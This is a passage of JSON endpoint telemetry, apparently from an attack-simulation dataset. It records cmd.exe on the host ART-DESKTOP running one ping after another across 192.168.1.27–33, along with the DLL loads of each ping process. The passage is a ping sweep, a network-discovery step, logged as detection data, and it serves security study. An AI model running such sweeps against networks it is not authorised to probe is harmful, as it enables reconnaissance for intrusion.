"{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "process", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572116990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.27", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2812, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "process", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572121840000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.28", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2416, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572121990000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "process", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572126990000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.29", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6660, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127300000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127300000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127300000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "process", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572131990000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.30", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6172, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "process", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572136830000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.31", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3476, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572136980000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572137140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "process", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572141840000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.32", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6672, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "process", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572146830000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.33", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2216, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2216, - "process_name": 